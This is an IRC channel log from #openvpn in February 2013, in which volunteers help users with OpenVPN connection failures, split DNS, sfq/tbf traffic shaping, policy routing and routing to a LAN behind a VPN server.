23:40 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn
23:40 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Client Quit]
23:45 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn
23:48 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: BBL]
--- Day changed Thu Feb 14 2013
00:04 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn
00:04 -!- jtruckz [~jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: BBL]
01:07 -!- b1rkh0ff [~b1rkh0ff@178.77.22.0] has quit [Ping timeout: 272 seconds]
01:19 -!- b1rkh0ff [~b1rkh0ff@178.77.1.72] has joined #openvpn
01:42 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
02:23 -!- p3rror [~mezgani@2001:0:53aa:64c:ca5:6914:d606:a524] has joined #openvpn
02:33 -!- chick3n [~d0dger@pa-67-235-87-119.dhcp.embarqhsd.net] has quit [Read error: Connection reset by peer]
02:44 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 272 seconds]
03:01 -!- Devastator [~devas@186.214.111.94] has joined #openvpn
03:16 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 276 seconds]
03:19 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
03:20 -!- zz_AsadH is now known as AsadH
03:26 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
03:56 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Remote host closed the connection]
03:56 -!- md_5- [md_5@mcdevs/trusted/md-5] has joined #openvpn
04:06 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
04:17 -!- Devastator [~devas@186.214.111.94] has quit [Changing host]
04:17 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
04:22 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection]
04:23 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
04:30 -!- dazo_afk is now known as dazo
05:04 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
05:20 -!- md_5- is now known as md_5
05:55 -!- Saviq_ [~Saviq@178.182.180.40.nat.umts.dynamic.t-mobile.pl] has joined #openvpn
05:55 -!- Saviq_ [~Saviq@178.182.180.40.nat.umts.dynamic.t-mobile.pl] has quit [Client Quit]
06:43 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds]
06:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:03 -!- master_of_master [~master_of@p57B5322D.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
07:05 -!- master_of_master [~master_of@p57B52CEE.dip.t-dialin.net] has joined #openvpn
07:14 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Connection timed out]
07:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
07:18 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has joined #openvpn
07:19 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
07:28 -!- MFSOT [~mfsot@pool-74-106-78-146.spfdma.east.verizon.net] has quit [Quit: MFSOT]
07:45 -!- p3rror [~mezgani@2001:0:53aa:64c:ca5:6914:d606:a524] has quit [Ping timeout: 245 seconds]
07:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
08:07 -!- nickanderson_afk is now known as nickanderson
08:12 -!- nickanderson [~cmdln@ginger.pilgrimpage.com] has left #openvpn []
08:20 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn
08:24 -!- Saviq_ [~Saviq@178.180.221.108.nat.umts.dynamic.t-mobile.pl] has joined #openvpn
08:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
08:30 -!- Saviq_ [~Saviq@178.180.221.108.nat.umts.dynamic.t-mobile.pl] has quit [Ping timeout: 248 seconds]
08:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
08:31 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn
08:44 -!- p3rror [~mezgani@2001:0:53aa:64c:c41:26b2:d606:a524] has joined #openvpn
08:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
08:54 -!- knobo [~bohmer@81.175.44.217] has joined #openvpn
08:56 < knobo> I have trouble connecting with openvpn from one host (host1) to the server, but another host (host2) goes fine. How can I debug this?
08:56 < knobo> I get: Thu Feb 14 15:55:38 2013 TCP: connect to server::10101 failed, will try again in 5 seconds: Connection timed out
08:57 < knobo> "nmap -sU -p 10101 -v SERVER" says: Host "SERVER" appears to be up ... good.
08:58 < knobo> and PORT STATE SERVICE\n 10101/udp open|filtered unknown
08:58 < knobo> the client which does not work is a debian lenny installation
08:59 < knobo> and it is behind a different network than the one that works.
08:59 < knobo> ssh works fine though.
09:00 < knobo> I tried to change proto to tcp, and it did not help
09:01 < rob0> TCP is not recommended. Please read the entire /topic, as it said you should do. :) There are too many variables to begin to guess. Make a pastebin.
09:02 < knobo> host1 runs OpenVPN 2.1_rc11, and the server runs OpenVPN 2.1.0
09:02 -!- gitsu-sa [~user@unaffiliated/gitsu-sa] has joined #openvpn
09:02 < gitsu-sa> hey; any idea how to lock some app to openvpn under Linux?
09:02 < gitsu-sa> i would like to stop them working when openvpn is disconnected
09:03 < rob0> "lock"? If you tell the app to use your tunnel IP address, it will.
09:03 < gitsu-sa> and what will it do when openvpn is down?
09:04 < rob0> heh
09:04 < gitsu-sa> and btw i don't know my tunnel IP, it is random
09:04 < rob0> Please read the entire /topic, as it said you should do. :)
09:04 < rob0> !welcome
09:04 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki
09:04 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
09:04 < rob0> !goal
09:04 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
09:05 < gitsu-sa> i would like that some apps can access the internet only when openvpn is up
09:05 < gitsu-sa> :o
09:07 < rob0> maybe you want to script something, and/or seek help specific to these unnamed apps.
09:11 < gitsu-sa> then an easier thing like: internet access only by the openvpn?
09:11 < rob0> !redirect
09:11 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
09:11 <@vpnHelper> http://ircpimps.org/redirect.png
09:11 < rob0> !def1
09:11 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1"
09:13 < gitsu-sa> are you sure that this will block internet access when openvpn is down?
09:19 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Read error: Connection reset by peer]
09:27 < knobo> http://pastebin.com/wV9RerTu
09:27 < knobo> Here is the config, and also the result of the command
09:27 < knobo> when I run it on the client that does not work.
09:29 < rob0> aha, this is simple. You're not running a server, you're running p2p mode. Only one connection is possible unless you use multi-client "server" mode. See --mode in the manual.
09:29 < knobo> When I run it from another client, it works fine
09:29 < knobo> But I'm not connecting with two clients
09:29 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
09:30 < knobo> I only tried the other client, because it does not work from the other.
09:30 < knobo> As it says in the topic, it is most likely the firewall
09:30 < knobo> But can I test that?
09:31 < rob0> depends on your OS and your firewall, and would not directly be on topic here.
09:31 < knobo> ok. Any other suggestions?
09:33 < rob0> If it just times out when you try to connect, it means it's not reaching the other openvpn peer for some reason. That reason would of course be outside openvpn.
09:34 < rob0> Are you sure that "server" is resolving correctly on each of the connecting peers? Try using the IP address to eliminate that.
09:41 -!- jY [~jy@photoblog.com] has left #openvpn []
09:53 < knobo> I did use the ip address, but i changed it to anonymize it.
10:02 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
10:08 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection]
10:36 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
10:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:53 -!- raidz_away is now known as raidz
10:55 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
11:00 -!- AsadH is now known as zz_AsadH
11:01 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 260 seconds]
11:03 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
11:06 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 256 seconds]
11:06 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
11:08 -!- r3zon8 [~r3zon8@vpn.interimhealthcare.com] has left #openvpn []
11:13 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
11:22 -!- nahmaste [~namaste@c-69-181-131-136.hsd1.ca.comcast.net] has joined #openvpn
11:25 < nahmaste> is it possible to use the DNS on the other side of an openvpn connection while not breaking name lookup on the local LAN that's served by a local DNS server? so i want to be able to look up hostA on the local LAN (which is known to local DNS serverA) and also look up hostB on the remote LAN (which is known to remote DNS serverB)
11:26 <@krzee> !splitdns
11:26 <@vpnHelper> "splitdns" is see http://www.thekelleys.org.uk/dnsmasq/doc.html for dnsmasq, which will let you do split-dns setups
11:26 <@krzee> it's unrelated to openvpn, but that's how you do it ^
11:29 < nahmaste> krzee: thanks for the link. im currently using bind9/named on the local LAN... so i'd have to replace it with dnsmasq for splitdns, or can it be done with the former?
11:29 <@krzee> dnsmasq
11:29 < pekster> BIND can do it too
11:29 <@krzee> *shrug*
11:29 < pekster> It's just more complicated to use BIND than dnsmasq
11:29 <@krzee> using views?
11:29 < rob0> views
11:30 <@krzee> heh ya i guess that works too
11:30 <@krzee> never used bind views for anything more than IRC host spoofing lol
11:30 < pekster> views are common on corporate setups running split-DNS
11:30 <@krzee> (tell the irc nameserver it resolves, but the rest of the world it doesn't)
11:31 < nahmaste> thanks for the info guys, ill look into it
11:32 -!- amir [~amir@unaffiliated/amir] has joined #openvpn
11:38 <+hazardous> hi crazy hi pek, mornin
11:39 <@krzee> mornin
11:41 -!- zz_AsadH is now known as AsadH
11:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
11:47 -!- dazo is now known as dazo_afk
11:49 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
11:50 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 260 seconds]
11:57 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has joined #openvpn
12:03 < bandroidx> anyone know if there is an easy way to limit bandwidth depending on the number of connected users on an openvpn server, like full 100mbit if 1 user, 50/50 if 2 users, 30/30/30 if 3 users, etc?
12:03 < pekster> QoS
12:03 < bandroidx> yes the shaping part is not a problem
12:04 < bandroidx> its the based on number of openvpn users that is
12:04 < bandroidx> i am wondering if its going to have to involve some in depth scripting based on connect/disconnect scripts
12:04 < pekster> Not really. your example suggests you want to use the link and fairly queue for backend clients
12:05 < bandroidx> oh good point
12:05 < pekster> I'd just use a queue like sfq at leaf nodes (in the Linux/tc world) and call it go
12:05 < bandroidx> i am over thinking it
12:05 < pekster> good*
12:05 < pekster> hfsc/htb can be used too, but yea, you need rules and crap to put clients into buckets; that's messy, and unless you have some real need, probably pointless
12:06 < bandroidx> i was planning on going with htb
12:06 < bandroidx> now i realize that's not ideal
12:06 < pekster> Check out sfq leaf qdiscs
12:06 < pekster> I have great success with those on the end of my egress queues
12:07 < bandroidx> and since its all through an openvpn tunnel they can't blow through it by opening many connections
12:07 < pekster> Basically, it ensures that no single stream of traffic can "dwarf out" the others
12:07 < pekster> Easy fix for you then: use tbf at the root, and put sfq under it
12:07 < pekster> Done
12:08 < pekster> No htb, no dynamic rules, none of that
12:08 < bandroidx> sweet
12:08 < bandroidx> and if they open like 10 ftp connections it won't matter because its over 1 single tunnel connection
12:09 < bandroidx> would i even need a token bucket filter at the root?
12:09 < pekster> Not if your upstream queuing is okay
12:09 < pekster> I'm on cable, and that crap has NASTY large queues, so I really require a tbf at my root to avoid flooding it
12:09 < pekster> I can literally get 30 second (not ms, 30 *second*) ping times by flooding upload
12:10 < bandroidx> ahh
12:10 < bandroidx> this is a dedi
12:10 < bandroidx> so it should be ok i think
12:10 < bandroidx> 100/100 dedi
12:10 < pekster> Still depends how upstream works ;)
12:10 < bandroidx> true
12:10 < bandroidx> seems the example will work at first glance
12:10 < bandroidx> http://pastie.org/6166422
12:12 < bandroidx> this is the original: http://pastie.org/6166434 - is whats shown at the bottom auto generated based on whats in the sfq.tcc? i am not clear what is going on there
12:13 < pekster> I have nfi what "sfq.tcc" is
12:13 < bandroidx> its a file they made
12:13 < pekster> Right
12:13 < bandroidx> what is odd they are using tcc
12:13 < bandroidx> the command is tc
12:14 < bandroidx> so i am confused lol
12:14 < pekster> no clue what tcc is either
12:14 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
12:14 < bandroidx> odd they would have a typo on their own howto
12:14 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn
12:14 < pekster> You don't pipe 'tc' commands to the 'tc' command...
12:14 < pekster> It's some random paste online; maybe it's just wrong ;)
12:14 < bandroidx> so then tcc must be something different
12:15 < pekster> Lots of bad/crappy/wrong guides on "The Internet"
12:15 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Remote host closed the connection]
12:15 < bandroidx> i thought this was the official tc howto though lol
12:15 < pekster> my qdisc on my uplink, as reported by 'tc qdisc show dev eth0.1' http://fpaste.org/iGCf/
12:15 < pekster> http://lartc.org/howto/ <-- the most "official" howto you're going to find
12:16 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org)
12:16 < bandroidx> your uplink is like 3mbit?
12:16 < pekster> give or take, yea
12:16 < pekster> You don't need the htb/prio stuff (that's for me to do filtering based on netfilter CLASSIFY targets)
12:17 < pekster> The things you want to note are my tbf at the root (if you need a "master speed" knob) and sfq as a leaf-qdisc
12:17 < pekster> The rest is just a sample that may not be suitable for you
12:17 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
12:17 < pekster> 2:1 is my prio band 0 for "realtime" traffic, 2:2 is where sfq sits for all my client's "normal" traffic, and 2:3 is strictly for bittorrent/DHT
12:18 < pekster> (hence a priomap of all 1's to drop unclassified things into 2:2)
12:18 < pekster> Again, that's all not really useful for you, I think
12:19 < bandroidx> can i see your priomap?
12:19 < bandroidx> i want to do something similar on my home connection
12:19 < pekster> It's all there dude
12:19 < bandroidx> how does it know what is bittorrent?
12:19 < pekster> netfilter
12:20 < bandroidx> ah so you have netfilter setup to put the various traffic into different bands?
12:20 < pekster> http://fpaste.org/dpoB/
12:20 < pekster> see iptables-extensions(8) for the CLASSIFY target
12:20 < bandroidx> ahhh ok, i did some work with classify in the past, i forget what for
12:20 < pekster> You can do it in tc filter rules too
12:21 < pekster> I hate tc-filter, because it *still* lacks a lousy manpage
12:21 < bandroidx> so bittorrent/dht are on 1119 and 6112?
12:21 < pekster> netfilter is statefully aware anyway
12:21 < pekster> No
12:21 < pekster> 2:1 is prio band 0
12:21 < pekster> "realtime"
12:21 < bandroidx> ahhh what do you use that for? sip?
12:21 < pekster> games
12:21 < bandroidx> ahh ok
12:22 < bandroidx> where does that catch bittorrent?
12:22 < pekster> line 7-9
12:22 < pekster> It's a secondary IP on that host
12:22 < bandroidx> ahhhhhh
12:22 < bandroidx> ok now i get it :)
12:22 < pekster> line 9 doesn't actually "accept" the packet, just short-circuits the rules so stupid peer can't get priority through me by using gaming ports
12:23 < bandroidx> got you, it just sets the class
12:23 < pekster> I could technically re-write that all using tc filters. But netfilter is better anyway since you can use the powerful state system
12:23 < pekster> Yup
12:23 < bandroidx> where is TOS used?
12:23 < bandroidx> i see you're setting TOS
12:23 < bandroidx> is that a code netfilter uses directly?
12:24 < pekster> https://en.wikipedia.org/wiki/IPv4#Packet_structure
12:24 <@vpnHelper> Title: IPv4 - Wikipedia, the free encyclopedia (at en.wikipedia.org)
12:24 < bandroidx> ah ok you're setting it for down stream?
12:28 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
12:29 < bandroidx> pekster: so it seems all i really need to do is tc qdisc add dev tun0 root sfq perturb 10
12:29 < pekster> Yup
12:30 < bandroidx> now i run 2 openvpn servers on the same box, if i also do tc qdisc add dev tun1 root sfq perturb 10
12:30 < bandroidx> will that share equally between them?
12:30 < pekster> (I set ToS for upstream; that's all on egress)
12:30 < bandroidx> or each will be separately handled
12:30 < bandroidx> ah kk thats what i meant
12:30 < pekster> Not that most routers on the Internet actually bother to use it, but some "might"
12:31 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
12:31 < pekster> link-sharing is a more complicated topic. The LARTC howto I linked earlier is a good place to start
12:31 < pekster> But, the short answer is that "that won't work how you expect"
12:32 < pekster> You can't just connect 2 separate Internet links into a box and expect to magically double your bandwidth. That's not how it works
12:34 <+EugeneKay> It is on TV
12:35 -!- gitsu-sa [~user@unaffiliated/gitsu-sa] has quit [Read error: Connection reset by peer]
12:35 < bandroidx> i dont mean double my bandwidth, i mean i want it to share equally among all on both openvpn servers
12:35 < bandroidx> so if there are 2 on tun0 and 2 on tun1 they would get 25mbit each
12:36 < bandroidx> i am guessing its going to be fair on both tunnels but separately
12:36 < bandroidx> which means it wont be fair at all
12:36 < bandroidx> i guess i will need to allocate 50mbit to each
12:38 < bandroidx> well forgetting the second server for a second, if i dont set a max bandwidth on the root, will it use the interface speed?
12:38 -!- C-S-B [~C-S-B@host81-157-117-86.range81-157.btcentralplus.com] has quit [Ping timeout: 260 seconds]
12:39 < bandroidx> like lets say 3 people connect, one can do 50mbit, the other two can only do 10mbit, will it give the 50mbit user the full 50mbit?
12:39 < bandroidx> i assume it would
12:40 < bandroidx> EugeneKay: i think we are in a lot of the same channels, your nick is so familiar to me
12:41 < bandroidx> ahhh i know you from #koush
12:41 < bandroidx> thats where i see you commonly
12:42 -!- C-S-B [~C-S-B@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn
12:43 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
12:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
12:46 <+EugeneKay> About a dozen
12:47 < bandroidx> we are in about a dozen same channels or you are in about a dozen?
12:47 <+EugeneKay> The latter
12:47 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 244 seconds]
12:48 < bandroidx> ahh
12:48 <+EugeneKay> /whois EugeneKay will list the channels we share
12:48 < bandroidx> it only shows you in two
12:48 < bandroidx> i did
12:48 <+EugeneKay> Yeah, privacy mode is default now
12:48 < bandroidx> [EugeneKay] +#openvpn #koush
12:48 < bandroidx> ahh
12:48 <+EugeneKay> And I'm too lazy to remember how to turn it off
12:48 < pekster> bandroidx: Are you doing redirect-gateway or such? Just use sfq on your *physical* egress and sfq will take care of the rest
12:49 < bandroidx> i was just going to ask exactly that pekster
12:49 < pekster> Stop worrying so much about getting "exact, down to the bit" equal stream queuing
12:49 < bandroidx> basically i have tun0 openvpn server does redirect-gateway and tun1 openvpn server does not and is used for dante socks server
12:49 < pekster> Don't mess with per-VPN or per-client or egress on tun devices. You don't need any of that.
You need a single sfq rule, and maybe tbf at the root to own the queue
12:50 < bandroidx> awesome that makes life a lot easier
12:50 < pekster> Add complicated crap when you actually need it, not just because someone's blog told you to ;)
12:50 < bandroidx> hahahhaha
12:50 < bandroidx> nah i was just over thinking it
12:51 < bandroidx> didnt need a blog to do that, i do that on my own all the damn time
12:51 < bandroidx> especially when it comes to my health lol
12:51 < bandroidx> but what do you mean by "own the queue" regarding tbf at the root
12:52 < bandroidx> ahhh
12:52 < bandroidx> Please note that SFQ, like all non-shaping (work-conserving) qdiscs, is only useful if it owns the
12:52 < bandroidx> queue. This is the case when the link speed equals the actually available bandwidth. This holds for
12:52 < bandroidx> regular phone modems, ISDN connections and direct non-switched ethernet links.
12:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
12:52 < bandroidx> eww paste fail
12:52 -!- zhou3594 [~zhou3594@jindan.chem.ou.edu] has joined #openvpn
12:52 -!- zhou3594 is now known as eN_Joy
12:52 < bandroidx> my link speed = the bandwidth so i think i am good
12:52 < bandroidx> its not like a gigabit nic on a 100mbit line
12:53 < bandroidx> its 100mbit on 100mbit so i should be good
12:53 < pekster> an upstream router could still end up misconfigured, but generally that's probably accurate
12:53 < bandroidx> well actually the provider does something not give full bandwidth even though its a 100/100 dedi
12:54 < pekster> As soon as packets leave whatever network domain you control devices for, you have no control over what they do.
They could drop them, lose them, add obscene delays, etc
12:54 < bandroidx> but it holds true enough i dont think it should be a problem
12:54 < bandroidx> yeah but not much i can do about that
12:54 < bandroidx> as its not constant so i cant set it to any sane value
12:54 < pekster> Right
12:54 < pekster> I don't worry about the case my ISP fails to give me what I've set my tbf speed at, because if that's going on, something else is too that's going to screw me over anyway
12:55 < bandroidx> i am having a similar issue with my fios, i have 50/25 and i can get 50/25 no problem on torrents, ftp, speedtests, http downloads, etc. BUT when i try to watch youtube it usually drops down to 9mbit which is slightly too slow for 720p and it keeps rebuffering over and over and it makes me mad. so today i decided as a test i would setup openvpn on my tablet and see if it helped, and sure enough it fixed the problem 100%
12:56 < bandroidx> which really seems like verizon is traffic shaping youtube, but that makes no sense since they arent shaping anything else especially bittorrent
12:56 < bandroidx> strange right?
12:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
12:59 < bandroidx> the only other thing i can think of is that the verizon router is broken
13:00 < pekster> Could be a CDN issue too
13:00 < bandroidx> doesnt youtube have solid CDN?
13:01 < bandroidx> i mean they got like over 100 streaming servers all within like 10ms of me
13:01 < bandroidx> and my vpn is in france lol
13:01 < bandroidx> the one nice thing is i get zero ads
13:01 < pekster> You'd think, but they might interact with the ISP in a way that's breaking
13:01 < pekster> Yup, the ad crap is annoying
13:01 < bandroidx> i guess they dont have ads for france yet
13:02 < bandroidx> i dont get anything, no 5 seconds before skip shit or anything
13:02 < pekster> IIRC adblock can fix that
13:02 < bandroidx> for that reason i dont mind using openvpn for youtube on my tablet lol
13:02 < bandroidx> on android?
13:02 < pekster> Not unless you run firefox
13:02 < pekster> dunno if FF for android works with adblockplus
13:02 < bandroidx> this is the youtube app
13:02 < pekster> Then no :)
13:02 < bandroidx> but adblock for android blocks ads with host files
13:02 < bandroidx> but i dont think it works for youtube ads
13:02 < bandroidx> but not 100% sure
13:03 < bandroidx> EugeneKay would probably know
13:03 <+EugeneKay> I don't youtube
13:17 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer]
13:19 -!- eN_Joy [~zhou3594@jindan.chem.ou.edu] has quit [Ping timeout: 244 seconds]
13:30 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn
13:31 -!- benedikt [~benedikt@unaffiliated/benedikt] has left #openvpn []
13:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
13:36 < troker> Hey all - Quick question. I pay for a vpn service (you can see config files here http://hidemyass.com/vpn-config/UDP/Canada.Quebec.Montreal_LOC1S4.UDP.ovpn). This works fine and all my traffic goes up the VPN, *BUT* my desired configuration would not push ALL my traffic up; I only want some of my traffic to be sent up the VPN (based on port). Can anyone let me know how I should modify this config file so that only a "routable" interfac
13:36 < troker> created?
13:38 < pekster> !provider
13:38 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
13:39 < pekster> This said, what you want is called Policy Routing. LARTC has a good guide if you want to learn more: http://lartc.org/howto/ (Linux-based, although the basic premise holds across OSes)
13:39 <@vpnHelper> Title: Linux Advanced Routing & Traffic Control HOWTO (at lartc.org)
13:39 < rob0> well, that's possibly beside the point here. ^^ yes
13:39 < rob0> it is a question for your OS
13:39 < troker> pekster: Understood, sounds like a reasonable rule
13:39 < rob0> probably not for your provider's help desk :)
13:41 < pekster> troker: Yea. We can't really help (here) since it's not an "openvpn" problem. Your provider can't either, because you need help learning about networking and your OS/distro. Start with LARTC for Linux-based learning, and maybe follow-up in your distro's support forums or a general network forum/channel
13:41 < pekster> The internals of policy-routing are non-trivial if you're new to the theory, but I always encourage learning :)
13:42 < troker> pekster: I understand, I am mildly proficient with PF so I plan on dealing with the routing in there. My question was more related to OpenVPNs push rules.
13:42 < troker> If I may be allowed one general question: What is the best way to test traffic flow through an interface? Like say I start this script with --route-nopull and I get a tun0 interface. How can I test that traffic has the ability to move through that interface?
13:43 < pekster> Add a test route via that interface, and watch where it goes?
That's less a routing question (if you add a route correctly it'll get used) but a firewall question if you want traffic to actually go where you intend
13:44 < pekster> From openvpn's standpoint, if you (or the server pushes) 'redirect-gateway' you can either ignore it with --route-nopull, or override it on your OS with, say, a separate routing table
13:45 < troker> Ok cool, I think I have somewhat of a place to start taking a look at this issue - thanks for all your help
13:46 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
13:55 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Quit: troker]
13:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
14:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
14:16 -!- troker [~troker@129.63.253.84] has joined #openvpn
14:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
14:28 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds]
14:29 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn
14:29 -!- mode/#openvpn [+o dazo_afk] by ChanServ
14:29 -!- dazo_afk is now known as dazo
14:43 -!- troker [~troker@129.63.253.84] has quit [Quit: troker]
14:49 -!- troker [~troker@129.63.253.84] has joined #openvpn
14:52 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
14:55 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
15:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
15:04 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
15:10 < bandroidx> pekster: i was just thinking, if i run sfq on the egress interface and not on the tunnel interfaces, wouldnt that mean that people running many connections like bittorrent or ftp w/ 10 transfers will be able to barrel through the queuing process? i was thinking that if run on the tun0 they wouldnt be able to as it would be looking at a single tunnel connection to each user, but on the egress it will see the actual traffic being tunneled
15:10 < bandroidx> which may be many connections. or am i thinking of this wrong?
15:11 < pekster> Sure. But no one queue gets to dwarf out the others
15:14 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds]
15:15 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds]
15:19 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
15:35 -!- daemoen [~daemoen@216.245.201.138] has joined #openvpn
15:35 < daemoen> hello all
15:38 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit []
15:40 < daemoen> having issues with routed mode openvpn server on ubuntu, osx 10.8 client. firewall/server.conf: http://fpaste.org/9xYO
15:40 -!- troker [~troker@129.63.253.84] has quit [Quit: troker]
15:42 < daemoen> I can successfully ping 172.28.14.1 from the client, and the client's 172.16.14.6 from the server. I cannot however reach any of the 10/8 network behind the server from the client. routing table shows 10 via 172.28.14.5 as expected. traceroute shows traffic reaching the 172.28.14.1 (server).
no flow beyond that point
15:42 < pekster> !serverlan
15:42 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
